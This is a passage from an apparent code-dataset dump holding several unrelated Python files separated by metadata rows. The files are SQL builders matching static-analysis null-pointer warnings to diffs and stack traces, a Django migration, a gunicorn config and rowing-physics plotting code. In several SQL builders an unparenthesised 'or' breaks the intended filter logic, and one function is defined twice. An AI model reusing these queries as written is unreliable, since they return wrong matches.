            f'{tt}.bug_type = "NULL_DEREFERENCE" AND '
            f'LOCATE({dt}.file,{tt}.file) != "" or '
            f'LOCATE({tt}.file,{dt}.file) != "" AND '
            f'((({tt}.bug_lower BETWEEN {dt}.patch_lower AND '
            f'{dt}.patch_upper) OR ({tt}.bug_upper BETWEEN '
            f'{dt}.patch_lower AND {dt}.patch_upper)) OR '
            f'(({dt}.patch_lower BETWEEN {tt}.bug_lower AND '
            f'{tt}.bug_upper) OR ({dt}.patch_lower BETWEEN '
            f'{tt}.bug_lower AND {tt}.bug_upper)));')
def generate_code_diff_query_spotbugs(diff_table: str, tool_table: str) -> str:
    """Return SQL joining SpotBugs warnings to code-diff hunks.

    Same overlap join as generate_code_diff_query, restricted to
    null-pointer ("NP_") bug types.
    """
    dt = f'`{diff_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {dt} INNER JOIN {tt} ON '
            f'{dt}.image_tag = {tt}.image_tag WHERE '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'LOCATE( "NP_",{tt}.bug_type) != "" AND '
            f'LOCATE({dt}.file,{tt}.file) != "" or '
            f'LOCATE({tt}.file,{dt}.file) != "" AND '
            f'((({tt}.bug_lower BETWEEN {dt}.patch_lower AND '
            f'{dt}.patch_upper) OR ({tt}.bug_upper BETWEEN '
            f'{dt}.patch_lower AND {dt}.patch_upper)) OR '
            f'(({dt}.patch_lower BETWEEN {tt}.bug_lower AND '
            f'{tt}.bug_upper) OR ({dt}.patch_lower BETWEEN '
            f'{tt}.bug_lower AND {tt}.bug_upper)));')
# NOTE(review): duplicate definition — generate_code_diff_query_infer is
# already defined above with an identical body; this second `def` silently
# rebinds the module-level name. Consider deleting one of the two copies.
def generate_code_diff_query_infer(diff_table: str, tool_table: str) -> str:
    """Return SQL joining Infer NULL_DEREFERENCE warnings to code-diff hunks."""
    return 'SELECT * FROM `{diff_table}` INNER JOIN `{tool_table}` ON ' \
           '`{diff_table}`.image_tag = `{tool_table}`.image_tag WHERE ' \
           '(`{tool_table}`.version = "failed" OR `{tool_table}`.version = "b") AND ' \
           '`{tool_table}`.bug_type = "NULL_DEREFERENCE" AND ' \
           'LOCATE(`{diff_table}`.file,`{tool_table}`.file) != "" or ' \
           'LOCATE(`{tool_table}`.file,`{diff_table}`.file) != "" AND ' \
           '(((`{tool_table}`.bug_lower BETWEEN `{diff_table}`.patch_lower AND ' \
           '`{diff_table}`.patch_upper) OR (`{tool_table}`.bug_upper BETWEEN ' \
           '`{diff_table}`.patch_lower AND `{diff_table}`.patch_upper)) OR ' \
           '((`{diff_table}`.patch_lower BETWEEN `{tool_table}`.bug_lower AND ' \
           '`{tool_table}`.bug_upper) OR (`{diff_table}`.patch_lower BETWEEN ' \
           '`{tool_table}`.bug_lower AND `{tool_table}`.bug_upper)));'.format(**{
               'diff_table': diff_table,
               'tool_table': tool_table,
           })
def generate_covered_lines_query(covered_lines_table: str, tool_table: str) -> str:
    """Return SQL joining tool warnings to test-covered lines.

    Matches rows on image_tag where a covered line falls within the
    reported bug line range (or vice versa).
    """
    cl = f'`{covered_lines_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {cl} INNER JOIN {tt} ON '
            f'{cl}.image_tag = {tt}.image_tag WHERE '
            f'LOCATE({cl}.file,{tt}.file) != "" AND '
            f'((({tt}.bug_lower BETWEEN {cl}.line AND '
            f'{cl}.line) OR ({tt}.bug_upper BETWEEN '
            f'{cl}.line AND {cl}.line)) OR '
            f'(({cl}.line BETWEEN {tt}.bug_lower AND '
            f'{tt}.bug_upper) OR ({cl}.line BETWEEN '
            f'{tt}.bug_lower AND {tt}.bug_upper)));')
def generate_covered_lines_original_query_infer(covered_lines_table: str, tool_table: str) -> str:
    """Return SQL joining Infer NULL_DEREFERENCE reports to exactly-covered lines."""
    cl = f'`{covered_lines_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {cl} ON '
            f'{tt}.image_tag = {cl}.image_tag AND '
            f'{cl}.line = {tt}.bug_upper AND '
            f'{cl}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({cl}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {cl}.file) != "") AND '
            f'{tt}.bug_type = "NULL_DEREFERENCE";')
def generate_covered_lines_original_query(covered_lines_table: str, tool_table: str) -> str:
    """Return SQL joining tool reports to exactly-covered lines (no bug-type filter)."""
    cl = f'`{covered_lines_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {cl} ON '
            f'{tt}.image_tag = {cl}.image_tag AND '
            f'{cl}.line = {tt}.bug_upper AND '
            f'{cl}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({cl}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {cl}.file) != "");')
def generate_covered_lines_original_query_spotbugs(covered_lines_table: str, tool_table: str) -> str:
    """Return SQL joining SpotBugs NP_* reports to exactly-covered lines."""
    cl = f'`{covered_lines_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {cl} ON '
            f'{tt}.image_tag = {cl}.image_tag AND '
            f'{cl}.line = {tt}.bug_upper AND '
            f'{cl}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({cl}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {cl}.file) != "") AND '
            f'LOCATE( "NP_",{tt}.bug_type) != "";')
def generate_stack_trace_query(stack_trace_table: str, tool_table: str) -> str:
    """Return SQL joining tool warnings to stack-trace lines.

    Matches rows on image_tag where a stack-trace line falls within the
    reported bug line range (or vice versa).
    """
    st = f'`{stack_trace_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {st} INNER JOIN {tt} ON '
            f'{st}.image_tag = {tt}.image_tag WHERE '
            f'LOCATE({st}.file,{tt}.file) != "" AND '
            f'((({tt}.bug_lower BETWEEN {st}.line AND '
            f'{st}.line) OR ({tt}.bug_upper BETWEEN '
            f'{st}.line AND {st}.line)) OR '
            f'(({st}.line BETWEEN {tt}.bug_lower AND '
            f'{tt}.bug_upper) OR ({st}.line BETWEEN '
            f'{tt}.bug_lower AND {tt}.bug_upper)));')
def generate_stack_trace_original_query_infer(stack_trace_table: str, tool_table: str) -> str:
    """Return SQL joining Infer NULL_DEREFERENCE reports to exact stack-trace lines."""
    st = f'`{stack_trace_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {st} ON '
            f'{tt}.image_tag = {st}.image_tag AND '
            f'{st}.line = {tt}.bug_upper AND '
            f'{st}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({st}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {st}.file) != "") AND '
            f'{tt}.bug_type = "NULL_DEREFERENCE";')
def generate_stack_trace_original_query(stack_trace_table: str, tool_table: str) -> str:
    """Return SQL joining tool reports to exact stack-trace lines (no bug-type filter)."""
    st = f'`{stack_trace_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {st} ON '
            f'{tt}.image_tag = {st}.image_tag AND '
            f'{st}.line = {tt}.bug_upper AND '
            f'{st}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({st}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {st}.file) != "");')
def generate_stack_trace_original_query_spotbugs(stack_trace_table: str, tool_table: str) -> str:
    """Return SQL joining SpotBugs NP_* reports to exact stack-trace lines."""
    st = f'`{stack_trace_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {tt} INNER JOIN {st} ON '
            f'{tt}.image_tag = {st}.image_tag AND '
            f'{st}.line = {tt}.bug_upper AND '
            f'{st}.line = {tt}.bug_lower AND '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'(LOCATE({st}.file,{tt}.file) != "" OR '
            f'LOCATE({tt}.file, {st}.file) != "") AND '
            f'LOCATE( "NP_",{tt}.bug_type) != "";')
def generate_report_diff_query(tool_table: str) -> str:
    """Return SQL selecting image_tags where the failed build has more reports than the passed build.

    Left-joins per-image_tag report counts for failed vs. passed versions;
    a NULL passed-side count also qualifies.
    """
    return f"""SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;"""
def generate_report_diff_query_infer(tool_table: str) -> str:
    """Return SQL selecting image_tags with more failed-build NULL_DEREFERENCE reports than passed-build."""
    return f"""SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') AND bug_type = 'NULL_DEREFERENCE' group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') AND bug_type = 'NULL_DEREFERENCE' group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;"""
def generate_report_diff_query_spotbugs(tool_table: str) -> str:
    """Return SQL selecting image_tags with more failed-build NP_* reports than passed-build."""
    return f"""SELECT f.image_tag
from(SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'failed' or version = 'b') AND LOCATE( 'NP_', bug_type) != '' group by image_tag) f
LEFT OUTER join (SELECT image_tag, count(*) as count FROM `{tool_table}` where (version = 'passed' or version = 'f') AND LOCATE( 'NP_', bug_type) != '' group by image_tag) p
on f.image_tag = p.image_tag
WHERE (f.count > p.count) OR (p.count IS NULL)
;"""
| 61.975124
| 270
| 0.625672
| 1,603
| 12,457
| 4.500936
| 0.040549
| 0.214553
| 0.091476
| 0.056549
| 0.978378
| 0.972003
| 0.965073
| 0.962578
| 0.954816
| 0.928067
| 0
| 0
| 0.192823
| 12,457
| 200
| 271
| 62.285
| 0.717553
| 0.008028
| 0
| 0.748503
| 1
| 0.071856
| 0.689853
| 0.414123
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08982
| false
| 0.017964
| 0
| 0.08982
| 0.179641
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
13410ee1c3cfb90c86b81b3d672a15b774d8b3d8
| 1,249
|
py
|
Python
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 12
|
2017-03-29T11:55:20.000Z
|
2022-03-29T20:03:41.000Z
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf-wagtail
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 8
|
2020-06-05T18:16:24.000Z
|
2021-09-07T23:53:11.000Z
|
home/website/migrations/0038_auto_20170403_1440.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 2
|
2018-03-31T15:06:55.000Z
|
2019-06-25T16:22:08.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2017-04-03 14:40
from __future__ import unicode_literals
from django.db import migrations


class Migration(migrations.Migration):
    """Drop the retired sweet/transport partner fields from the homepage model."""

    dependencies = [
        ('website', '0037_auto_20170330_0911'),
    ]

    # One RemoveField per retired column; the comprehension keeps the list
    # identical to spelling each operation out by hand.
    operations = [
        migrations.RemoveField(model_name='homepage', name=field)
        for field in (
            'sweet_partner',
            'sweet_partner_title',
            'sweet_partner_title_bg',
            'sweet_partner_title_en',
            'transport_partner',
            'transport_partner_title',
            'transport_partner_title_bg',
            'transport_partner_title_en',
        )
    ]
| 26.020833
| 47
| 0.564452
| 110
| 1,249
| 6.1
| 0.363636
| 0.250373
| 0.309985
| 0.357675
| 0.718331
| 0.718331
| 0.718331
| 0.718331
| 0.551416
| 0
| 0
| 0.038323
| 0.331465
| 1,249
| 47
| 48
| 26.574468
| 0.765269
| 0.053643
| 0
| 0.6
| 1
| 0
| 0.222222
| 0.120441
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13449ab15f996379083070e1f5b6137391fc8c1b
| 93
|
py
|
Python
|
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
gunicorn_config.py
|
adventuringImagineer/estimator-retweet-adventure
|
3c3ea925f38cd50870c6150a804014bfd07ca190
|
[
"MIT"
] | null | null | null |
# Gunicorn server configuration (loaded with `gunicorn -c gunicorn_config.py`).

# Listen on every interface, port 80.
bind = "0.0.0.0:80"
# bind='0.0.0.0:5000'
# Number of worker processes handling requests.
workers = 2
# Seconds a silent worker may take before being killed and restarted.
timeout = 120
# worker_class = "gevent"
| 18.6
| 25
| 0.623656
| 19
| 93
| 3
| 0.578947
| 0.210526
| 0.210526
| 0.245614
| 0.280702
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227848
| 0.150538
| 93
| 5
| 25
| 18.6
| 0.493671
| 0.462366
| 0
| 0
| 0
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1355fc758e8e7aaef21e4dc12021ab876ea893fc
| 83,640
|
py
|
Python
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | 1
|
2017-04-24T15:20:40.000Z
|
2017-04-24T15:20:40.000Z
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | 2
|
2016-11-03T21:38:34.000Z
|
2016-11-29T09:50:57.000Z
|
rowingphysics/rowplots.py
|
sanderroosendaal/rowingphysics
|
9b809c80708e96d13761861218ff7744829cc4c9
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import print_function
from .rowingphysics import *
from .crew import *
from .rigging import *
import pylab
import time
from . import rowingphysics
import numpy as np
from matplotlib import pyplot
from six.moves import range
def timeinterpol(v,r,rg):
    """Return the wall-clock time (s) that one constantvelofast run takes.

    Runs constantvelofast for velocity v, crew r and rigging rg with a
    fixed parameter set and reports only the elapsed time; the simulation
    result itself is discarded.
    """
    started = time.time()
    constantvelofast(v,r,rg,timestep=0.01,aantal=15,aantal2=15,
                     Fmin=100,Fmax=600)
    return time.time()-started
def plot_blade():
    """ Plots blade lift and drag coefficients vs angle of attack

    Uses the quasi-static blade model
        C_D = 2*CLmax*sin(a)**2 ,  C_L = CLmax*sin(2a)
    with CLmax = 1.0 and the angle of attack a in radians (-90..+90 deg).
    Produces a single figure via pyplot.show(); returns nothing.
    """
    CLmax = 1.0
    # angle of attack, degrees converted to radians (explicit np instead
    # of relying on star-imported linspace/pi)
    a = np.linspace(-90,90)*np.pi/180
    C_D = 2*CLmax*np.sin(a)**2.
    C_L = CLmax*np.sin(2.*a)
    pyplot.clf()
    pyplot.subplot(111)
    pyplot.plot(a,C_D,label='C_D')
    pyplot.plot(a,C_L,label='C_L')
    pylab.legend(loc='best')
    pyplot.xlabel("Angle of attack (rad)")
    # was 'Drag Coefficient'; the axis carries both lift and drag curves
    pyplot.ylabel('Blade force coefficient')
    pyplot.show()
def plotwindeffect(r,rg,aantal=10):
    """ Plots the percentage boat speed change vs head wind for four
    boat types (1x, 2-, 4-, 8+) at a fixed power of 580 W.

    NOTE(review): the r and rg arguments are overwritten immediately
    (r = crew(); rg is re-read from disk for every boat), so the
    parameters are effectively ignored -- confirm whether that is
    intentional.
    """
    pyplot.clf()
    r = crew()
    thepower = 580.
    filenames = ['1x.txt','2-.txt','4-.txt','8+.txt']
    # hard-coded Windows path to the rigging definition files
    directory = "C:\\python\\rowingdata\\rigging\\"
    resvelo = zeros([aantal,4])
    perc = zeros([aantal,4])
    wind = linspace(-6,6,aantal)
    for i in range(4):
        rg = read_obj(directory+filenames[i])
        # zero-wind reference speed for this boat
        res = rowingphysics.constantwatt(thepower,r,rg)
        v0 = res[1]
        for j in range(aantal):
            res = rowingphysics.constantwattfast(thepower,r,rg,windv=wind[j])
            resvelo[j,i] = res[1]
            # speed change relative to the no-wind reference, in percent
            perc[j,i] = 100.*(res[1]-v0)/v0
            print((i,j,wind[j],perc[j,i],rg.Nrowers,rg.mb))
        # wind is negated so that positive x means head wind
        pyplot.plot(-wind,perc[:,i],label=filenames[i])
    pyplot.legend(loc='best')
    pyplot.xlabel("head wind (m/s)")
    pyplot.ylabel("boat speed increase")
    pyplot.show()
def temposeriesvaughan(tempomin,tempomax,F,crew,rigging,aantal=30,
                       timestep=0.03):
    """ plot maximum, minimum and average boat speed in a range of spm

    For each stroke rate between tempomin and tempomax (aantal steps) the
    stroke simulation is iterated until the boat velocity is
    self-consistent, after which the stroke-average, minimum and maximum
    velocities are plotted against stroke rate.
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates crew.tempo in place.
    """
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)
    velocity = zeros(aantal)
    vmin = zeros(aantal)
    vmax = zeros(aantal)
    power = zeros(aantal)
    ratios = zeros(aantal)
    energies = zeros(aantal)
    for i in range(len(tempos)):
        dv = 1
        vend = 4
        crew.tempo = tempos[i]
        # iterate until the average velocity has converged to 0.1%
        while (dv/vend > 0.001):
            res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0)
            dv = res[0]
            vend = res[1]
        res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10)
        velocity[i] = res[2]
        ratios[i] = res[3]
        energies[i] = res[4]
        power[i] = res[5]
        vmax[i] = res[7]
        vmin[i] = res[8]
    calctime = time.time()-tm
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        pyplot.plot (tempos,velocity)
        pyplot.plot (tempos,vmin)
        pyplot.plot (tempos,vmax)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def temposeries(tempomin,tempomax,F,crew,rigging,aantal=30,timestep=0.03):
    """ Various plots as a function of spm, fixed force

    Sweeps the stroke rate between tempomin and tempomax (aantal steps)
    at constant handle force F, converging each point to a
    self-consistent boat velocity.  Plots a 2x2 grid: velocity vs tempo,
    power vs tempo, velocity vs power, and stroke ratio vs tempo.
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates crew.tempo in place.
    """
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)
    velocity = zeros(aantal)
    power = zeros(aantal)
    ratios = zeros(aantal)
    energies = zeros(aantal)
    for i in range(len(tempos)):
        dv = 1
        vend = 4
        crew.tempo = tempos[i]
        # iterate until the average velocity has converged to 0.1%
        while (dv/vend > 0.001):
            res = rowingphysics.energybalance(F,crew,rigging,vend,timestep,0)
            dv = res[0]
            vend = res[1]
        res = rowingphysics.stroke(F,crew,rigging,vend,timestep,10)
        velocity[i] = res[2]
        ratios[i] = res[3]
        energies[i] = res[4]
        power[i] = res[5]
    calctime = time.time()-tm
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        pyplot.subplot(221)
        pyplot.plot (tempos,velocity)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (tempos,power)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Power (W)')
        pyplot.subplot(223)
        pyplot.plot (power,velocity)
        pyplot.xlabel("Power (W)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(224)
        pyplot.plot (tempos,ratios)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Ratio')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def catchangleseries(anglemin,anglemax,F,crew,rigging,aantal=30,timestep=0.03):
    """ Plots various plots as a function of catch angle

    Sweeps the catch angle between anglemin and anglemax (radians,
    aantal steps) at constant handle force F, converging each point to a
    self-consistent boat velocity.  Plots a 2x2 grid: velocity, power,
    velocity-vs-power and stroke ratio, with the angle axes in degrees.
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates rigging.catchangle in place.
    """
    tm = time.time()
    catchangles = linspace(anglemin,anglemax,aantal)
    velocity = zeros(aantal)
    power = zeros(aantal)
    ratios = zeros(aantal)
    energies = zeros(aantal)
    for i in range(len(catchangles)):
        dv = 1
        vend = 4
        rigging.catchangle = catchangles[i]
        catchacceler = 5
        # converge the average velocity, feeding back the catch acceleration
        while (dv/vend > 0.001):
            res = rowingphysics.energybalance(F,crew,rigging,vend,
                                              timestep,0,
                                              catchacceler=catchacceler)
            dv = res[0]
            vend = res[1]
            catchacceler = res[14]
        res = rowingphysics.stroke(F,crew,rigging,vend,
                                   timestep,10,catchacceler=catchacceler)
        velocity[i] = res[2]
        ratios[i] = res[3]
        energies[i] = res[4]
        power[i] = res[5]
    calctime = time.time()-tm
    # plots
    try:
        # was 'pyplot.clf' (attribute access, no call): figure never cleared
        pyplot.clf()
        pyplot.subplot(221)
        pyplot.plot (np.degrees(catchangles),velocity)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (np.degrees(catchangles),power)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('Power (W)')
        pyplot.subplot(223)
        pyplot.plot (power,velocity)
        pyplot.xlabel("Power (W)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(224)
        pyplot.plot (np.degrees(catchangles),ratios)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('Ratio')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def longlegs(rg,doplot=1,v0=3.962):
    """Run an energy-balance simulation for a 'long legs' stroke profile.

    Builds a crew with a trapezium stroke profile (x1=0.1, h2=0.75) at
    30 spm and returns the energybalance result for rigging rg, starting
    from velocity v0 at 250 W.
    """
    from .crew import crew,trapezium
    rower = crew(strokeprofile=trapezium(x1=0.1,h2=0.75),tempo=30.)
    return rowingphysics.energybalance(250,rower,rg,v0,dt=0.01,doplot=doplot)
def shortlegs(rg,doplot=1,v0=3.997):
    """Run an energy-balance simulation for a 'short legs' stroke profile.

    Builds a crew with a trapezium stroke profile (x1=0.15, x2=0.5,
    h2=0.9) at 30 spm and returns the energybalance result for rigging
    rg, starting from velocity v0 at 250 W.
    """
    from .crew import crew, trapezium
    rower = crew(strokeprofile=trapezium(x1=0.15,x2=0.5,h2=0.9),tempo=30.)
    return rowingphysics.energybalance(250,rower,rg,v0,dt=0.01,doplot=doplot)
def plotrecstyle(crew,trecovery,aantal=50,empirical=0):
    """ Plots position of handle and CM during recovery

    crew      -- crew object providing vhandle/vcm/dxhandle and strokelength
    trecovery -- recovery duration (s)
    aantal    -- number of samples along the recovery
    empirical -- optional CSV file with measured (time, velocity) columns;
                 0 disables the overlay
    """
    # was named 'time', shadowing the time module
    times = linspace(0,trecovery,aantal)
    vh = zeros(aantal)
    vcrecovery = zeros(aantal)
    handlepos = zeros(aantal)+crew.strokelength
    vavg = crew.strokelength/trecovery
    d = crew.strokelength
    for i in range(0,aantal-1):
        vh[i] = crew.vhandle(vavg,trecovery,times[i])
        vcrecovery[i] = crew.vcm(vh[i],handlepos[i])
        handlepos[i+1] = d+d*crew.dxhandle(vavg,trecovery,times[i])
    # last sample: no handle position beyond the end of the recovery
    vh[aantal-1] = crew.vhandle(vavg,trecovery,times[aantal-1])
    vcrecovery[aantal-1] = crew.vcm(vh[aantal-1],handlepos[aantal-1])
    if (empirical!=0):
        # measured data: column 0 is time, column 1 is (sign-flipped) velocity
        empdata = genfromtxt(empirical, delimiter = ',')
        emptime = empdata[:,0]
        empv = -empdata[:,1]
        empdt = emptime[1]-emptime[0]
    # was 'pyplot.clf' (attribute access, no call): figure never cleared
    pyplot.clf()
    pyplot.subplot(211)
    pyplot.plot(times,vh,'r-',label = 'Handle speed')
    pyplot.plot(times,vcrecovery, 'b-',label = 'CM speed')
    if (empirical!=0):
        pyplot.plot(emptime,empv,'g-',label = 'Measured')
    pylab.legend(loc='lower right')
    pyplot.xlabel("time (s)")
    pyplot.ylabel("velocity (m/s)")
    pyplot.subplot(212)
    pyplot.plot(times,handlepos,'r-',label = 'Handle Position')
    pylab.legend(loc='upper right')
    pyplot.xlabel("time (s)")
    pyplot.ylabel("position (m)")
    pyplot.show()
def plotrowerforcecurve(F,cr,aantal=50):
    """ Plots the force curve

    Samples cr.forceprofile at aantal handle positions along the stroke
    (0 .. cr.strokelength) for peak force F and plots force vs handle
    position.  Returns 1.
    """
    x = linspace(0,cr.strokelength,aantal)
    y1 = zeros(aantal)
    for i in range(len(x)):
        y1[i] = cr.forceprofile(F,x[i])
    # was 'pyplot.clf' (attribute access, no call): figure never cleared
    pyplot.clf()
    pyplot.plot(x,y1,'-g', label='Force Curve')
    pylab.legend(loc='best')
    pyplot.xlabel("Handle Position")
    pyplot.ylabel('Force')
    pyplot.show()
    return 1
def plotforcecurve(F,cr,aantal=50):
    """ Plots different force curves

    Plots cr.forceprofile for five trapezium stroke profiles (labelled
    T1..T5) vs handle position, at peak force F.  Returns 1.
    NOTE(review): mutates cr.strokeprofile; leaves it set to the default
    trapezium() on return (same as the original implementation).
    """
    from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
    x = linspace(0,cr.strokelength,aantal)
    profiles = [trapezium(x1=0.1,h2=0.5),
                trapezium(x1=0.1,h2=0.75),
                trapezium(x1=0.1,x2=0.5,h2=0.75),
                trapezium(x1=0.15,x2=0.5,h2=0.9),
                trapezium()]
    styles = ['-g','-r','-b','-k','-m']
    labels = ['T1','T2','T3','T4','T5']
    # was 'pyplot.clf' (attribute access, no call): figure never cleared
    pyplot.clf()
    # one loop replaces five copy-pasted sampling loops
    for profile,style,lab in zip(profiles,styles,labels):
        cr.strokeprofile = profile
        y = zeros(aantal)
        for i in range(len(x)):
            y[i] = cr.forceprofile(F,x[i])
        pyplot.plot(x,y,style, label=lab)
    pylab.legend(loc='best')
    pyplot.xlabel("Handle Position")
    pyplot.ylabel('Force')
    pyplot.show()
    return 1
def plotforcecurveRIM(F,cr,aantal=50):
    """ More force curve plots

    Plots cr.forceprofile for four strongmiddle2 profiles (frac = -0.5,
    0, 0.5, 1) and the default trapezium (labelled T1..T5) vs handle
    position, at peak force F.  Returns 1.
    NOTE(review): mutates cr.strokeprofile; leaves it set to the default
    trapezium() on return (same as the original implementation).
    """
    from .crew import flat,strongmiddle,strongmiddle2,strongend,strongbegin,trapezium
    x = linspace(0,cr.strokelength,aantal)
    profiles = [strongmiddle2(frac=-0.5),
                strongmiddle2(frac=0),
                strongmiddle2(frac=0.5),
                strongmiddle2(frac=1),
                trapezium()]
    styles = ['-g','-r','-b','-k','-m']
    labels = ['T1','T2','T3','T4','T5']
    # was 'pyplot.clf' (attribute access, no call): figure never cleared
    pyplot.clf()
    # one loop replaces five copy-pasted sampling loops
    for profile,style,lab in zip(profiles,styles,labels):
        cr.strokeprofile = profile
        y = zeros(aantal)
        for i in range(len(x)):
            y[i] = cr.forceprofile(F,x[i])
        pyplot.plot(x,y,style, label=lab)
    pylab.legend(loc='best')
    pyplot.xlabel("Handle Position")
    pyplot.ylabel('Force')
    pyplot.show()
    return 1
def styleseries(tempomin,tempomax,F,crew,rigging,
                aantal=30,timestep=0.03,doplot=1,timewise=0):
    """ Power velocity curve for various rowing styles

    Sweeps the stroke rate from tempomin to tempomax (spm, aantal steps)
    for five trapezium stroke profiles (T1..T5) at constant handle force
    F, then draws the chart selected by doplot:
      1: velocity vs power        5: velocity vs CrewNerd check
      2: velocity vs tempo        6: check vs tempo
      3: power vs tempo           7: velocity vs RIM check
      4: 500m time vs power       8: velocity vs RIM stroke efficiency
    Returns the wall-clock calculation time in seconds.
    NOTE(review): mutates crew.strokeprofile and crew.tempo in place;
    crew.strokeprofile is left at trapezium() on return.
    """
    from .crew import flat,strongmiddle,strongend,strongbegin,trapezium
    tm = time.time()
    tempos = linspace(tempomin,tempomax,aantal)

    def _sweep(profile,verbose=0):
        # Run the tempo sweep for one stroke profile and collect the
        # per-tempo steady-state stroke metrics.
        velocity = zeros(aantal)
        power = zeros(aantal)
        ratios = zeros(aantal)
